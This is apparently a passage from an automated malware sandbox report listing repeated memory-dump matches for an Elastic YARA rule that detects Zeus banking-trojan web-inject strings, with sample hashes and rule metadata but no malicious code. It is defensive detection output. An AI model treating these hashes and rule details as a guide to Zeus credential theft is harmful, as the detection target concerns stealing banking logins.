      Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
